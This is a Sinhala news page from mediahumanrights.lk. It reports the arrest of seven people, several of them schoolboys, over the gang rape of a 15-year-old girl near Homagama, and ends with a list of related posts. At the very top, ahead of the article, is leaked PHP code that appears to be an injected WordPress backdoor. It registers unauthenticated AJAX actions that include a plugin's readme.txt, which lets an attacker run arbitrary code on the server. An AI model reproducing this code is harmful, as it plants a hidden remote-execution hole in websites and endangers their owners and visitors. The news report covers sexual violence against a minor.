if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } හත් දෙනෙකු එක්ව පාසල් දැරියක් සමූහ දුෂණය කරයි.. දැරිය රෝහලේ… - mediahumanrights.lk
mediahumanrights.lk
Local News News

හත් දෙනෙකු එක්ව පාසල් දැරියක් සමූහ දුෂණය කරයි.. දැරිය රෝහලේ…

පාසල් දරියක සමූහ දූෂණයට ලක් කිරීම සම්බන්ධයෙන් පාසල් සිසුන් ඇතුළු හත් දෙනකු පොලිසිය විසින් අත්අඩංගුවට ගෙන ඇත.

හෝමාගම පොලිසිය සඳහන් කරන්නේ පහළොස් හැවිරිදි මෙම පාසල් දරිය මෙසේ දූෂණයට ලක්කර ඇත්තේ ඇගේ පෙම්වතා බව කියන පාසල් සිසුවකුත් තවත් පාසල් පස් දෙනෙකු ඇතුළු හත් දෙනෙකුගේ පිරිසක් බවයි.

ඇගේ දෙමව්පියන් දැරිය පොලිසියට කළ පැමිණිල්ලක් මත විමර්ශන ආරම්භ කර තිබේ.

දූෂණයට ලක් වූ දැරිය හෝමාගම මූලික රෝහලට ඇතුළත් කර ඇත.

පැය හයක කාලයක් ඇතුළත ස්ථාන තුනකට රැගෙන ගොස් මෙම පිරිස වරින් වර දැරිය බරපතල ලිංගික අපයෝජනයට ලක් කර ඇති බව පරීක්ෂණවලදී දැනට අනාවරණය වී තිබේ.

Related posts

මෙවර ශිෂ්‍යත්වය ලියූ සිසුන්ට අධ්‍යාපන අමාත්‍යාංශයෙන් නිවේදනයක්

Shiran Viraj

ජනපතිගේ හොද වැඩපිලිවෙල විනාශ කරන්නේ මහින්ද හා නාමල්ද..

Shiran Viraj

මා සමග විවාහ වී සිටියදී වෙනත් අයෙක් විවාහ කරගත්තේ කෙසේද- දරුවෙක් සමග කාන්තාවක් දිළුම් අමුණුගමගෙන් අහයි

Shiran Viraj